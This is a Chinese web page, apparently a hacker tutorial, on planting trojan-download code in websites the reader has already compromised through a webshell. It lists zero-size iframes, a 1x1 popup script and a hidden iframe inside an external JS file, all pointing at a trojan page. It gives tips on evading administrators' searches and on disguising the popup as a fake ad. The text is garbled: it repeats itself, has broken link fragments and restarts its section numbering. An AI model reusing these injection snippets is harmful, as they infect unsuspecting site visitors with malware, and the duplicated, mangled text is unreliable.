七彩空间资讯信息中心
最常见的挂马代码
方法一:
一般在你入侵了一个站拿到了webshell的时候。最常见的挂马代码如下 :
<html>
<iframe src="http://192.168.1.3/inc/joke.htm" width="0" height="0" frameborder="0"></iframe>
</html>
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank> http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm 也就是我门的网页 Trojan/Index.shtml" target="_blank">木马了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就是高了。我们把它设置为0也就是不显示了, 对方也就看不见我们的这个页面,Trojan/Index.shtml" target="_blank">木马也就会被下载到本地。
方法二:
<SCRIPT language=javascript>
window.open ("http://192.168.1.3/inc/joke.htm","","toolbar=no, location=no,directories=no, status=no,menubar=no,scrollbars=no, width=1,height=1");
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的Trojan/Index.shtml" target="_blank">木马页是满屏显示的 其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了,flashTrojan/Index.shtml" target="_blank">木马也很厉害的哦。
方法三:
还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe height=0 width=0 src='http://192.168.1.3/inc/joke.htm' name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............
方法四:
代码加进包含文件<!--#include file="conn.asp"-->
一般在你入侵了一个站拿到了webshell的时候。最常见的挂马代码如下 :
<html>
<iframe src="http://192.168.1.3/inc/joke.htm" width="0" height="0" frameborder="0"></iframe>
</html>
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank> http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm 也就是我门的网页 Trojan/Index.shtml" target="_blank">木马了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就是高了。我们把它设置为0也就是不显示了, 对方也就看不见我们的这个页面,Trojan/Index.shtml" target="_blank">木马也就会被下载到本地。
方法二:
<SCRIPT language=javascript>
window.open ("http://192.168.1.3/inc/joke.htm","","toolbar=no, location=no,directories=no, status=no,menubar=no,scrollbars=no, width=1,height=1");
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的Trojan/Index.shtml" target="_blank">木马页是满屏显示的 其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了,flashTrojan/Index.shtml" target="_blank">木马也很厉害的哦。
方法三:
还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe height=0 width=0 src='http://192.168.1.3/inc/joke.htm' name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............
方法四:
代码加进包含文件<!--#include file="conn.asp"-->
信息推荐
资讯中心 | 电子商务 | 搜索营销 | 设计学院 | 中医养生 | 养生保健 | 节日祝福 | 民俗文化 | 奇闻趣事
建站知识 | 人世百态 | 网站导航 | 传统节日 | 搜索热点 | 星座运势 | 趣闻轶事 | 祝福的话 | 短信大全
© 2023 QicaiSpace.Com
建站知识 | 人世百态 | 网站导航 | 传统节日 | 搜索热点 | 星座运势 | 趣闻轶事 | 祝福的话 | 短信大全
© 2023 QicaiSpace.Com